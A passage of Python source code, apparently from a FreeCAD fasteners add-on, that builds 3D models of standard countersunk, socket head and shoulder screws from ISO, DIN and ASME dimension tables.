PntC4 = Base.Vector(s / math.sqrt(3.0) + chamHori, 0.0, kmean - cham - cham) # s/math.sqrt(3.0)
edgeC1 = Part.makeLine(PntC3, PntC1)
edgeC2 = Part.makeLine(PntC1, PntC2)
edgeC3 = Part.makeLine(PntC2, PntC4)
edgeC4 = Part.makeLine(PntC4, PntC3)
cWire = Part.Wire([edgeC4, edgeC1, edgeC2, edgeC3])
cFace = Part.Face(cWire)
chamCut = cFace.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
# Part.show(cWire)
# Part.show(chamCut)
# create hexagon
mhex = Base.Matrix()
mhex.rotateZ(math.radians(60.0))
polygon = []
vhex = Base.Vector(s / math.sqrt(3.0), 0.0, kmean)
for i in range(6):
polygon.append(vhex)
vhex = mhex.multiply(vhex)
polygon.append(vhex)
hexagon = Part.makePolygon(polygon)
hexFace = Part.Face(hexagon)
solidHex = hexFace.extrude(Base.Vector(0.0, 0.0, c - kmean))
# Part.show(solidHex)
hexCham = solidHex.cut(chamCut)
# Part.show(hexCham)
topFaces = topShell.Faces
topFaces.append(hexCham.Faces[6])
topFaces.append(hexCham.Faces[12])
topFaces.append(hexCham.Faces[14])
topFaces.append(hexCham.Faces[13])
topFaces.append(hexCham.Faces[8])
topFaces.append(hexCham.Faces[2])
topFaces.append(hexCham.Faces[1])
hexFaces = [hexCham.Faces[5], hexCham.Faces[11], hexCham.Faces[10]]
hexFaces.extend([hexCham.Faces[9], hexCham.Faces[3], hexCham.Faces[0]])
hexShell = Part.Shell(hexFaces)
# Center of flange:
Pnt0 = Base.Vector(0.0, 0.0, hF)
Pnt1 = Base.Vector(s / 2.0, 0.0, hF)
# arc edge of flange:
Pnt2 = Base.Vector(arc1_x, 0.0, arc1_z)
Pnt3 = Base.Vector(dc / 2.0, 0.0, c / 2.0)
Pnt4 = Base.Vector((dc - c) / 2.0, 0.0, 0.0)
Pnt5 = Base.Vector(dia / 2.0 + r1, 0.0, 0.0) # start of fillet between head and shank
Pnt6 = Base.Vector(dia / 2.0 + r1 - r1 * sqrt2_, 0.0, -r1 + r1 * sqrt2_) # arc-point of fillet
Pnt7 = Base.Vector(dia / 2.0, 0.0, -r1) # end of fillet
Pnt8 = Base.Vector(dia / 2.0, 0.0, -a_point) # Start of thread
edge1 = Part.makeLine(Pnt0, Pnt1)
edge2 = Part.makeLine(Pnt1, Pnt2)
edge3 = Part.Arc(Pnt2, Pnt3, Pnt4).toShape()
edge4 = Part.makeLine(Pnt4, Pnt5)
edge5 = Part.Arc(Pnt5, Pnt6, Pnt7).toShape()
# make a cutter for the hexShell
PntHC1 = Base.Vector(0.0, 0.0, arc1_z)
PntHC2 = Base.Vector(0.0, 0.0, 0.0)
edgeHC1 = Part.makeLine(Pnt2, PntHC1)
edgeHC2 = Part.makeLine(PntHC1, PntHC2)
edgeHC3 = Part.makeLine(PntHC2, Pnt0)
HCWire = Part.Wire([edge2, edgeHC1, edgeHC2, edgeHC3, edge1])
HCFace = Part.Face(HCWire)
hex2Cut = HCFace.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
hexShell = hexShell.cut(hex2Cut)
# Part.show(hexShell)
topFaces.extend(hexShell.Faces)
# bolt points
cham_t = P * math.sqrt(3.0) / 2.0 * 17.0 / 24.0
PntB0 = Base.Vector(0.0, 0.0, -a_point)
PntB1 = Base.Vector(dia / 2.0, 0.0, -l + cham_t)
PntB2 = Base.Vector(dia / 2.0 - cham_t, 0.0, -l)
PntB3 = Base.Vector(0.0, 0.0, -l)
edgeB2 = Part.makeLine(PntB1, PntB2)
edgeB3 = Part.makeLine(PntB2, PntB3)
# if self.RealThread.isChecked():
if self.rThread:
aWire = Part.Wire([edge2, edge3, edge4, edge5])
boltIndex = 4
else:
if a_point <= r1:
edgeB1 = Part.makeLine(Pnt7, PntB1)
aWire = Part.Wire([edge2, edge3, edge4, edge5, edgeB1, edgeB2, edgeB3])
boltIndex = 7
else:
edgeB1 = Part.makeLine(Pnt8, PntB1)
edge6 = Part.makeLine(Pnt7, Pnt8)
aWire = Part.Wire([edge2, edge3, edge4, edge5, edge6, \
edgeB1, edgeB2, edgeB3])
boltIndex = 8
# aFace =Part.Face(aWire)
# Part.show(aWire)
headShell = aWire.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
# FreeCAD.Console.PrintMessage("the head with revolve: " + str(dia) + "\n")
# Part.show(headShell)
chamFace = headShell.Faces[0].cut(solidHex)
# Part.show(chamFace)
topFaces.append(chamFace.Faces[0])
for i in range(1, boltIndex):
topFaces.append(headShell.Faces[i])
if self.rThread:
if dia < 3.0 or dia > 5.0:
rthread = self.makeShellthread(dia, P, halfturns, True, offSet)
rthread.translate(Base.Vector(0.0, 0.0, -a_point - 2.0 * P))
for tFace in rthread.Faces:
topFaces.append(tFace)
headShell = Part.Shell(topFaces)
screw = Part.Solid(headShell)
else:
rthread = self.makeShellthread(dia, P, halfturns, False, offSet)
rthread.translate(Base.Vector(0.0, 0.0, -a_point - 2.0 * P))
for tFace in rthread.Faces:
topFaces.append(tFace)
headShell = Part.Shell(topFaces)
head = Part.Solid(headShell)
cyl = self.cutChamfer(dia, P, l)
# FreeCAD.Console.PrintMessage("before the end of the cut: " + str(dia) + "\n")
screw = head.cut(cyl)
else:
screwShell = Part.Shell(topFaces)
screw = Part.Solid(screwShell)
return screw
# also used for ISO 7046 countersunk flat head screws with H cross recess
# also used for ISO 7047 raised countersunk head screws with H cross recess
# also used for ISO 10642 Hexagon socket countersunk head screws
# also used for ISO 14582 Hexalobular socket countersunk head screws, high head
# also used for ISO 14584 Hexalobular socket raised countersunk head screws
def makeIso7046(self, SType='ISO7046', ThreadType='M6', l=25.0):
dia = self.getDia(ThreadType, False)
# FreeCAD.Console.PrintMessage("der 2009Kopf mit l: " + str(l) + "\n")
if SType == 'ISO10642':
P, b, dk_theo, dk_mean, da, ds_min, e, k, r, s_mean, t, w = FsData["iso10642def"][ThreadType]
ePrax = s_mean / math.sqrt(3.0) / 0.99
ht = 0.0
a = 2 * P
t_mean = t
elif SType == 'ASMEB18.3.2':
P, b, dk_theo, dk_mean, k, r, s_mean, t = FsData["asmeb18.3.2def"][ThreadType]
ePrax = s_mean / math.sqrt(3.0) / 0.99
ht = 0.0
a = 2 * P
t_mean = t
else: # still need the data from iso2009def, but this screw can not created here
P, a, b, dk_theo, dk_mean, k, n_min, r, t_mean, x = FsData["iso2009def"][ThreadType]
ht = 0.0 # Head height of flat head
if SType == 'ISO7046':
cT, mH, mZ = FsData["iso7046def"][ThreadType]
if SType == 'ISO7047':
rf, t_mean, cT, mH, mZ = FsData["Raised_countersunk_def"][ThreadType]
# Lengths and angles for calculation of head rounding
beta = math.asin(dk_mean / 2.0 / rf) # angle of head edge
tan_beta = math.tan(beta)
alpha = beta / 2.0 # half angle
# height of raised head top
ht = rf - (dk_mean / 2.0) / tan_beta
# print 'he: ', he
h_arc_x = rf * math.sin(alpha)
h_arc_z = ht - rf + rf * math.cos(alpha)
# FreeCAD.Console.PrintMessage("h_arc_z: " + str(h_arc_z) + "\n")
if SType == 'ISO14582':
P, a, b, dk_theo, dk_mean, k, r, tt, A, t_mean = FsData["iso14582def"][ThreadType]
ePrax = A / 2.0 / 0.99
if SType == 'ISO14584':
P, b, dk_theo, dk_mean, f, k, r, rf, x, tt, A, t_mean = FsData["iso14584def"][ThreadType]
ePrax = A / 2.0 / 0.99
# Lengths and angles for calculation of head rounding
beta = math.asin(dk_mean / 2.0 / rf) # angle of head edge
tan_beta = math.tan(beta)
ctp = - (dk_mean / 2.0) / tan_beta # Center Top Edge = center for rf
betaA = math.asin(ePrax / rf) # angle of head edge at start of recess
ht = ctp + ePrax / math.tan(betaA)
alpha = betaA + (beta - betaA) / 2.0 # half angle of top Arc
h_arc_x = rf * math.sin(alpha)
h_arc_z = ctp + rf * math.cos(alpha)
# FreeCAD.Console.PrintMessage("the head with iso r: " + str(r) + "\n")
cham = (dk_theo - dk_mean) / 2.0
rad225 = math.radians(22.5)
rad45 = math.radians(45.0)
rtan = r * math.tan(rad225)
# FreeCAD.Console.PrintMessage("Checking rtan: " + str(rtan) + "\n")
if b > (l - k - rtan / 2.0 - 1.0 * P):
bmax = l - k - rtan / 2.0 - 1.0 * P
else:
bmax = b
        ### determine the number of thread half turns with math.modf
residue, turns = math.modf((bmax) / P)
halfturns = 2 * int(turns)
if residue < 0.5:
a_point = l - (turns + 1.0) * P
halfturns = halfturns + 1
else:
halfturns = halfturns + 2
a_point = l - (turns + 2.0) * P
# halfturns = halfturns + 2
offSet = k + rtan - a_point
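        # halfturns: number of thread half turns to model; a_point: distance from
        # z = 0 down to the start of the thread (Pnt6 lies at z = -a_point).
        # offSet is passed to makeShellthread so that, after the later translation,
        # the top of the thread shell meets the end of the under-head fillet at
        # z = -(k + rtan).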
# Head Points
Pnt1 = Base.Vector(dk_mean / 2.0, 0.0, 0.0)
Pnt2 = Base.Vector(dk_mean / 2.0, 0.0, -cham)
Pnt3 = Base.Vector(dia / 2.0 + r - r * math.cos(rad45), 0.0, -k - rtan + r * math.sin(rad45))
# Arc-points
Pnt4 = Base.Vector(dia / 2.0 + r - r * (math.cos(rad225)), 0.0, -k - rtan + r * math.sin(rad225))
Pnt5 = Base.Vector(dia / 2.0, 0.0, -k - rtan)
Pnt6 = Base.Vector(dia / 2.0, 0.0, -a_point)
if SType == 'ISO10642' or SType == 'ISO14582' or SType == 'ASMEB18.3.2':
if SType == 'ISO10642' or SType == 'ASMEB18.3.2':
recess, recessShell = self.makeAllen2(s_mean, t_mean, 0.0)
Pnt0 = Base.Vector(ePrax / 2.0, 0.0, -ePrax / 2.0)
PntCham = Base.Vector(ePrax, 0.0, 0.0)
edge1 = Part.makeLine(Pnt0, PntCham)
edgeCham2 = Part.makeLine(PntCham, Pnt1)
edge2 = Part.makeLine(Pnt1, Pnt2)
edge2 = Part.Wire([edgeCham2, edge2])
PntH0 = Base.Vector(ePrax / 2.0, 0.0, ht + k)
PntH1 = Base.Vector(ePrax, 0.0, ht + k)
if SType == 'ISO14582':
recess, recessShell = self.makeIso10664_3(tt, t_mean, 0.0) # hexalobular recess
Pnt0 = Base.Vector(0.0, 0.0, 0.0)
edge1 = Part.makeLine(Pnt0, Pnt1)
edge2 = Part.makeLine(Pnt1, Pnt2)
# bolt points with bolt chamfer
cham_b = P * math.sqrt(3.0) / 2.0 * 17.0 / 24.0
PntB1 = Base.Vector(dia / 2.0, 0.0, -l + cham_b)
PntB2 = Base.Vector(dia / 2.0 - cham_b, 0.0, -l)
PntB3 = Base.Vector(0.0, 0.0, -l)
if a_point <= (k + rtan):
edgeB0 = Part.makeLine(Pnt5, PntB1)
else:
edgeB0 = Part.makeLine(Pnt6, PntB1)
edgeB2 = Part.makeLine(PntB1, PntB2)
edgeB3 = Part.makeLine(PntB2, PntB3)
edgeB1 = Part.Wire([edgeB2, edgeB3])
else:
# bolt points
PntB1 = Base.Vector(dia / 2.0, 0.0, -l)
PntB2 = Base.Vector(0.0, 0.0, -l)
if a_point <= (k + rtan):
edgeB0 = Part.makeLine(Pnt5, PntB1)
else:
edgeB0 = Part.makeLine(Pnt6, PntB1)
edgeB1 = Part.makeLine(PntB1, PntB2)
if SType == 'ISO7047': # make raised head rounding
Pnt0 = Base.Vector(0.0, 0.0, ht)
Pnt0arc = Base.Vector(h_arc_x, 0.0, h_arc_z)
edge1 = Part.Arc(Pnt0, Pnt0arc, Pnt1).toShape()
edge2 = Part.makeLine(Pnt1, Pnt2)
PntH0 = Base.Vector(0.0, 0.0, ht + k)
PntH1 = Base.Vector(dk_mean / 2.0, 0.0, ht + k)
recess, recessShell = self.makeCross_H3(cT, mH, ht)
if SType == 'ISO7046':
# ISO7046
Pnt0 = Base.Vector(0.0, 0.0, ht)
edge1 = Part.makeLine(Pnt0, Pnt1) # make flat head
edge2 = Part.makeLine(Pnt1, Pnt2)
recess, recessShell = self.makeCross_H3(cT, mH, ht)
if SType == 'ISO14584': # make raised head rounding with chamfer
Pnt0 = Base.Vector(ePrax / 2.0, 0.0, ht - ePrax / 4.0)
PntCham = Base.Vector(ePrax, 0.0, ht)
PntArc = Base.Vector(h_arc_x, 0.0, h_arc_z)
edge1 = Part.makeLine(Pnt0, PntCham)
edgeArc = Part.Arc(PntCham, PntArc, Pnt1).toShape()
edge2 = Part.makeLine(Pnt1, Pnt2)
edge2 = Part.Wire([edgeArc, edge2])
PntH0 = Base.Vector(ePrax / 2.0, 0.0, ht + k)
PntH1 = Base.Vector(ePrax, 0.0, ht + k)
recess, recessShell = self.makeIso10664_3(tt, t_mean, ht) # hexalobular recess
edge3 = Part.makeLine(Pnt2, Pnt3)
edgeArc = Part.Arc(Pnt3, Pnt4, Pnt5).toShape()
edgeArc1 = Part.makeLine(Pnt3, Pnt4)
edgeArc2 = Part.makeLine(Pnt4, Pnt5)
edge6 = Part.makeLine(Pnt5, Pnt6)
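        # Select the profile to revolve: with a modelled thread the profile ends
        # where the thread starts; otherwise it continues down the plain shank to
        # the screw tip (edge6 is only needed when the thread starts below the
        # end of the under-head fillet).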
if self.rThread:
# aWire=Part.Wire([edge1,edge2,edge3,edgeArc])
aWire = Part.Wire([edge2, edge3, edgeArc])
else:
if a_point <= (k + rtan):
aWire = Part.Wire([edge2, edge3, edgeArc, edgeB0, edgeB1])
else:
aWire = Part.Wire([edge2, edge3, edgeArc, edge6, edgeB0, edgeB1])
# Part.show(aWire)
headShell = aWire.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
headFaces = headShell.Faces
# Part.show(headShell)
if SType == 'ISO7046' or SType == 'ISO14582':
# hCut is just a cylinder for ISO7046
hCut = Part.makeCylinder(dk_mean / 2.0, k, Pnt0)
# Part.show(hCut)
topFace = hCut.Faces[2]
else:
edgeH1 = Part.makeLine(Pnt1, PntH1)
edgeH2 = Part.makeLine(PntH1, PntH0)
edgeH3 = Part.makeLine(PntH0, Pnt0)
hWire = Part.Wire([edge1, edgeH3, edgeH2, edgeH1]) # Cutter for recess-Shell
hWire.reverse() # a fix to work with ver 18
hFace = Part.Face(hWire)
hCut = hFace.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
# Part.show(hWire)
topFace = hCut.Faces[0]
recessShell = recessShell.cut(hCut)
topFace = topFace.cut(recess)
# Part.show(topFace)
# Part.show(recessShell)
# Part.show(headShell)
headFaces.append(topFace.Faces[0])
headFaces.extend(recessShell.Faces)
if SType == 'ISO10642' or SType == 'ISO14582' or SType == 'ASMEB18.3.2':
if self.rThread:
if dia < 3.0 or dia > 5.0:
# if True:
rthread = self.makeShellthread(dia, P, halfturns, True, offSet)
rthread.translate(Base.Vector(0.0, 0.0, -a_point - 2.0 * P))
# head = head.fuse(rthread)
# Part.show(rthread)
for threadFace in rthread.Faces:
headFaces.append(threadFace)
screwShell = Part.Shell(headFaces)
screw = Part.Solid(screwShell)
else:
'''
# head = self.cutIsoThread(head, dia, P, turns, l)
rthread = self.makeShellthread(dia, P, halfturns, False)
rthread.translate(Base.Vector(0.0, 0.0,-a_point-2.0*P))
head = head.fuse(rthread)
head = head.removeSplitter()
cyl = self.cutChamfer(dia, P, l)
#FreeCAD.Console.PrintMessage("before the end of the cut: " + str(dia) + "\n")
head = head.cut(cyl)
'''
rthread = self.makeShellthread(dia, P, halfturns, False, offSet)
rthread.translate(Base.Vector(0.0, 0.0, -a_point - 2.0 * P))
# head = head.fuse(rthread)
# Part.show(rthread)
for threadFace in rthread.Faces:
headFaces.append(threadFace)
screwShell = Part.Shell(headFaces)
screw = Part.Solid(screwShell)
cyl = self.cutChamfer(dia, P, l)
screw = screw.cut(cyl)
else:
screwShell = Part.Shell(headFaces)
screw = Part.Solid(screwShell)
else:
if self.rThread:
rthread = self.makeShellthread(dia, P, halfturns, False, offSet)
rthread.translate(Base.Vector(0.0, 0.0, -a_point - 2.0 * P))
# head = head.fuse(rthread)
# Part.show(rthread)
for threadFace in rthread.Faces:
headFaces.append(threadFace)
screwShell = Part.Shell(headFaces)
screw = Part.Solid(screwShell)
return screw
    # make ISO 4762 Allen screw head
    # also used for DIN 7984 and DIN 6912 Allen screw heads
    # also used for ISO 14579 Hexalobular socket head cap screws
    # also used for ASME B18.3.1A socket head cap screws
def makeIso4762(self, SType='ISO4762', ThreadType='M6', l=25.0):
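        # Hexagon socket head cap screws (and the DIN 7984 / DIN 6912 low-head,
        # ASME B18.3.1A and ISO 14579 hexalobular variants): revolve the head
        # profile with under-head fillet and bearing-face chamfer, cut the socket
        # recess into the top face, and attach either a plain chamfered shank or
        # a modelled thread.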
dia = self.getDia(ThreadType, False)
        # FreeCAD.Console.PrintMessage("the 4762 head with l: " + str(l) + "\n")
# FreeCAD.Console.PrintMessage("the head with iso r: " + str(r) + "\n")
if SType == 'ISO14579':
P, b, dk_max, da, ds_mean, e, lf, k, r, s_mean, t, v, dw, w = FsData["iso4762def"][ThreadType]
tt, A, t = FsData["iso14579def"][ThreadType]
# Head Points 30° countersunk
# Pnt0 = Base.Vector(0.0,0.0,k-A/4.0) #Center Point for countersunk
Pnt0 = Base.Vector(0.0, 0.0, k - A / 8.0) # Center Point for flat countersunk
PntFlat = Base.Vector(A / 8.0, 0.0, k - A / 8.0) # End of flat part
Pnt1 = Base.Vector(A / 1.99, 0.0, k) # countersunk edge at head
edgeCham0 = Part.makeLine(Pnt0, PntFlat)
edgeCham1 = Part.makeLine(PntFlat, Pnt1)
edge1 = Part.Wire([edgeCham0, edgeCham1])
# Here is the next approach to shorten the head building time
# Make two helper points to create a cutting tool for the
# recess and recess shell.
PntH1 = Base.Vector(A / 1.99, 0.0, 2.0 * k)
elif SType == 'DIN7984':
P, b, dk_max, da, ds_min, e, k, r, s_mean, t, v, dw = FsData["din7984def"][ThreadType]
e_cham = 2.0 * s_mean / math.sqrt(3.0)
# Head Points 45° countersunk
Pnt0 = Base.Vector(0.0, 0.0, k - e_cham / 1.99 / 2.0) # Center Point for countersunk
PntFlat = Base.Vector(e_cham / 1.99 / 2.0, 0.0, k - e_cham / 1.99 / 2.0) # End of flat part
Pnt1 = Base.Vector(e_cham / 1.99, 0.0, k) # countersunk edge at head
edgeCham0 = Part.makeLine(Pnt0, PntFlat)
edgeCham1 = Part.makeLine(PntFlat, Pnt1)
edge1 = Part.Wire([edgeCham0, edgeCham1])
PntH1 = Base.Vector(e_cham / 1.99, 0.0, 2.0 * k)
elif SType == 'DIN6912':
P, b, dk_max, da, ds_min, e, k, r, s_mean, t, t2, v, dw = FsData["din6912def"][ThreadType]
e_cham = 2.0 * s_mean / math.sqrt(3.0)
# Head Points 45° countersunk
Pnt0 = Base.Vector(0.0, 0.0, k - e_cham / 1.99 / 2.0) # Center Point for countersunk
PntFlat = Base.Vector(e_cham / 1.99 / 2.0, 0.0, k - e_cham / 1.99 / 2.0) # End of flat part
Pnt1 = Base.Vector(e_cham / 1.99, 0.0, k) # countersunk edge at head
edgeCham0 = Part.makeLine(Pnt0, PntFlat)
edgeCham1 = Part.makeLine(PntFlat, Pnt1)
edge1 = Part.Wire([edgeCham0, edgeCham1])
PntH1 = Base.Vector(e_cham / 1.99, 0.0, 2.0 * k)
elif SType == 'ISO4762' or SType == 'ASMEB18.3.1A':
if SType == 'ISO4762':
P, b, dk_max, da, ds_mean, e, lf, k, r, s_mean, t, v, dw, w = FsData["iso4762def"][ThreadType]
if SType == 'ASMEB18.3.1A':
P, b, dk_max, k, r, s_mean, t, v, dw = FsData["asmeb18.3.1adef"][ThreadType]
e_cham = 2.0 * s_mean / math.sqrt(3.0)
# Head Points 45° countersunk
Pnt0 = Base.Vector(0.0, 0.0, k - e_cham / 1.99 / 2.0) # Center Point for countersunk
PntFlat = Base.Vector(e_cham / 1.99 / 2.0, 0.0, k - e_cham / 1.99 / 2.0) # End of flat part
Pnt1 = Base.Vector(e_cham / 1.99, 0.0, k) # countersunk edge at head
edgeCham0 = Part.makeLine(Pnt0, PntFlat)
edgeCham1 = Part.makeLine(PntFlat, Pnt1)
edge1 = Part.Wire([edgeCham0, edgeCham1])
PntH1 = Base.Vector(e_cham / 1.99, 0.0, 2.0 * k)
PntH2 = Base.Vector(0.0, 0.0, 2.0 * k)
edgeH1 = Part.makeLine(Pnt1, PntH1)
edgeH2 = Part.makeLine(PntH1, PntH2)
edgeH3 = Part.makeLine(PntH2, Pnt0)
hWire = Part.Wire([edge1, edgeH1, edgeH2, edgeH3]) # Cutter for recess-Shell
hFace = Part.Face(hWire)
hCut = hFace.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
# Part.show(hWire)
'''
PntH2 = Base.Vector(A/8.0,0.0, 2.0*k)
edgeH1 = Part.makeLine(Pnt1,PntH1)
edgeH2 = Part.makeLine(PntH1,PntH2)
edgeH3 = Part.makeLine(PntH2,PntFlat)
hWire = Part.Wire([edgeCham1,edgeH1,edgeH2,edgeH3]) # Cutter for recess-Shell
hFace = Part.Face(hWire)
hCut = hFace.revolve(Base.Vector(0.0,0.0,0.0),Base.Vector(0.0,0.0,1.0),360)
#Part.show(hWire)
'''
sqrt2_ = 1.0 / math.sqrt(2.0)
# depth = s_mean / 3.0
'''
if (b > l - 2*P):
bmax = l-2*P
else:
bmax = b
halfturns = round(2.0*(bmax+P)/P) # number of thread turns
if self.RealThread.isChecked():
a_real = l-(halfturns+2)*P/2.0 # point to fuse real thread
else:
a_real = l-halfturns*P/2.0 # starting point of thread
if a_real < r:
a_point = r*1.3
else:
a_point = a_real
'''
if b > l - 1.0 * P:
bmax = l - 1.0 * P
else:
bmax = b
        ### determine the number of thread half turns with math.modf
residue, turns = math.modf((bmax) / P)
halfturns = 2 * int(turns)
if residue < 0.5:
a_point = l - (turns + 1.0) * P
halfturns = halfturns + 1
else:
halfturns = halfturns + 2
a_point = l - (turns + 2.0) * P
# halfturns = halfturns + 2
offSet = r - a_point
# FreeCAD.Console.PrintMessage("The transition at a: " + str(a) + " turns " + str(turns) + "\n")
# rad30 = math.radians(30.0)
# Head Points
Pnt2 = Base.Vector(dk_max / 2.0 - v, 0.0, k) # start of fillet
Pnt3 = Base.Vector(dk_max / 2.0 - v + v * sqrt2_, 0.0, k - v + v * sqrt2_) # arc-point of fillet
Pnt4 = Base.Vector(dk_max / 2.0, 0.0, k - v) # end of fillet
Pnt5 = Base.Vector(dk_max / 2.0, 0.0, (dk_max - dw) / 2.0) # we have a chamfer here
Pnt6 = Base.Vector(dw / 2.0, 0.0, 0.0) # end of chamfer
Pnt7 = Base.Vector(dia / 2.0 + r, 0.0, 0.0) # start of fillet between head and shank
Pnt8 = Base.Vector(dia / 2.0 + r - r * sqrt2_, 0.0, -r + r * sqrt2_) # arc-point of fillet
Pnt9 = Base.Vector(dia / 2.0, 0.0, -r) # end of fillet
Pnt10 = Base.Vector(dia / 2.0, 0.0, -a_point) # start of thread
edge1 = Part.makeLine(Pnt0, Pnt1)
edge2 = Part.makeLine(Pnt1, Pnt2)
edge3 = Part.Arc(Pnt2, Pnt3, Pnt4).toShape()
edge4 = Part.makeLine(Pnt4, Pnt5)
edge5 = Part.makeLine(Pnt5, Pnt6)
edge6 = Part.makeLine(Pnt6, Pnt7)
edge7 = Part.Arc(Pnt7, Pnt8, Pnt9).toShape()
'''
# bolt points
PntB1 = Base.Vector(dia/2.0,0.0,-l-P) # Chamfer is made with a cut later
PntB2 = Base.Vector(0.0,0.0,-l-P)
#PntB3 = Base.Vector(0.0,0.0,-l)
edgeB0 = Part.makeLine(Pnt10,PntB1)
edgeB1 = Part.makeLine(PntB1,PntB2)
#edgeB2 = Part.makeLine(PntB2,PntB3)
edgeZ0 = Part.makeLine(PntB2,Pnt0)
aWire=Part.Wire([edge1,edge2,edge3,edge4,edge5,edge6,edge7,edge8, \
edgeB0, edgeB1, edgeZ0])
'''
if self.rThread:
aWire = Part.Wire([edge2, edge3, edge4, edge5, edge6, edge7])
else:
# bolt points
cham_t = P * math.sqrt(3.0) / 2.0 * 17.0 / 24.0
PntB1 = Base.Vector(dia / 2.0, 0.0, -l + cham_t)
PntB2 = Base.Vector(dia / 2.0 - cham_t, 0.0, -l)
PntB3 = Base.Vector(0.0, 0.0, -l)
# edgeB1 = Part.makeLine(Pnt10,PntB1)
edgeB2 = Part.makeLine(PntB1, PntB2)
edgeB3 = Part.makeLine(PntB2, PntB3)
if a_point <= (r + 0.0001):
edgeB1 = Part.makeLine(Pnt9, PntB1)
aWire = Part.Wire([edge2, edge3, edge4, edge5, edge6, edge7, \
edgeB1, edgeB2, edgeB3])
else:
edge8 = Part.makeLine(Pnt9, Pnt10)
edgeB1 = Part.makeLine(Pnt10, PntB1)
aWire = Part.Wire([edge2, edge3, edge4, edge5, edge6, edge7, edge8, \
edgeB1, edgeB2, edgeB3])
# Part.show(aWire)
headShell = aWire.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
# head = Part.Solid(headShell)
# Part.show(aWire)
# FreeCAD.Console.PrintMessage("the head with revolve: " + str(dia) + "\n")
headFaces = headShell.Faces
# Hex cutout
if SType == 'ISO14579':
# recess = self.makeIso10664(tt, t, k) # hexalobular recess
recess, recessShell = self.makeIso10664_3(tt, t, k) # hexalobular recess
elif SType == 'DIN6912':
recess, recessShell = self.makeAllen2(s_mean, t, k, t2) # hex with center
else:
recess, recessShell = self.makeAllen2(s_mean, t, k)
recessShell = recessShell.cut(hCut)
topFace = hCut.Faces[1]
# topFace = hCut.Faces[0]
topFace = topFace.cut(recess)
# Part.show(topFace)
# Part.show(recessShell)
# Part.show(headShell)
headFaces.append(topFace.Faces[0])
# headFaces.append(hCut.Faces[2])
# allenscrew = head.cut(recess)
# Part.show(hCut)
headFaces.extend(recessShell.Faces)
# if self.RealThread.isChecked():
if self.rThread:
# if (dia < 3.0) or (dia > 5.0):
if True:
# head = self.cutIsoThread(head, dia, P, turns, l)
rthread = self.makeShellthread(dia, P, halfturns, True, offSet)
rthread.translate(Base.Vector(0.0, 0.0, -a_point - 2.0 * P))
# Part.show(rthread)
for tFace in rthread.Faces:
headFaces.append(tFace)
headShell = Part.Shell(headFaces)
allenscrew = Part.Solid(headShell)
else:
# head = self.cutIsoThread(head, dia, P, turns, l)
rthread = self.makeShellthread(dia, P, halfturns, False, offSet)
rthread.translate(Base.Vector(0.0, 0.0, -a_point - 2.0 * P))
for tFace in rthread.Faces:
headFaces.append(tFace)
headShell = Part.Shell(headFaces)
allenscrew = Part.Solid(headShell)
cyl = self.cutChamfer(dia, P, l)
# FreeCAD.Console.PrintMessage("before the end of the cut: " + str(dia) + "\n")
allenscrew = allenscrew.cut(cyl)
else:
headShell = Part.Shell(headFaces)
allenscrew = Part.Solid(headShell)
return allenscrew
# make ISO 7379 Hexagon socket head shoulder screw
def makeIso7379(self, SType='ISO7379', ThreadType='M6', l=16):
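        # Shoulder screws (also ASME B18.3.4): the length parameter l is the
        # shoulder length l1; the head (height l3) is built above the shoulder
        # and the threaded portion (length l2) below it, either as a simplified
        # cylinder or as a modelled thread.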
if SType == 'ISO7379':
P, d1, d3, l2, l3, SW = FsData["iso7379def"][ThreadType]
if SType == 'ASMEB18.3.4':
P, d1, d3, l2, l3, SW = FsData["asmeb18.3.4def"][ThreadType]
d2 = self.getDia(ThreadType, False)
l1 = l
# define the fastener head and shoulder
# applicable for both threaded and unthreaded versions
point1 = Base.Vector(0, 0, l1 + l3)
point2 = Base.Vector(d3 / 2 - 0.04 * d3, 0, l3 + l1)
point3 = Base.Vector(d3 / 2, 0, l3 - 0.04 * d3 + l1)
point4 = Base.Vector(d3 / 2, 0, l1)
point5 = Base.Vector(d1 / 2, 0, l1)
point6 = Base.Vector(d1 / 2 - 0.04 * d1, 0, l1 - 0.1 * l3)
point7 = Base.Vector(d1 / 2, 0, l1 - 0.2 * l3)
point8 = Base.Vector(d1 / 2, 0, 0)
point9 = Base.Vector(d2 / 2, 0, 0)
edge1 = Part.makeLine(point1, point2)
edge2 = Part.makeLine(point2, point3)
edge3 = Part.makeLine(point3, point4)
edge4 = Part.makeLine(point4, point5)
edge5 = Part.Arc(point5, point6, point7).toShape()
edge6 = Part.makeLine(point7, point8)
edge7 = Part.makeLine(point8, point9)
top_face_profile = Part.Wire([edge1])
top_face = top_face_profile.revolve(Base.Vector(0, 0, 0), Base.Vector(0, 0, 1), 360)
head_shoulder_profile = Part.Wire([edge2, edge3, edge4, edge5, edge6, edge7])
if not self.rThread:
# if a modelled thread is not desired:
# add a cylindrical section to represent the threads
point10 = Base.Vector(d2 / 2 - 0.075 * d2, 0, -0.075 * l2)
point11 = Base.Vector(d2 / 2, 0, -0.15 * l2)
point12 = Base.Vector(d2 / 2, 0, -1 * l2 + 0.1 * d2)
point13 = Base.Vector(d2 / 2 - 0.1 * d2, 0, -1 * l2)
point14 = Base.Vector(0, 0, -1 * l2)
edge8 = Part.Arc(point9, point10, point11).toShape()
edge9 = Part.makeLine(point11, point12)
edge10 = Part.makeLine(point12, point13)
edge11 = Part.makeLine(point13, point14)
# append the wire with the added section
p_profile = Part.Wire([head_shoulder_profile, edge8, edge9, edge10, edge11])
# revolve the profile into a shell object
p_shell = p_profile.revolve(Base.Vector(0, 0, 0), Base.Vector(0, 0, 1), 360)
else:
# if we need a modelled thread:
# the revolved profile is only the head and shoulder
p_profile = head_shoulder_profile
p_shell = p_profile.revolve(Base.Vector(0, 0, 0), Base.Vector(0, 0, 1), 360)
# calculate the number of thread half turns
residue, turns = math.modf((l2) / P)
halfturns = 2 * int(turns)
if residue > 0.5:
halfturns = halfturns + 1
# make the threaded section
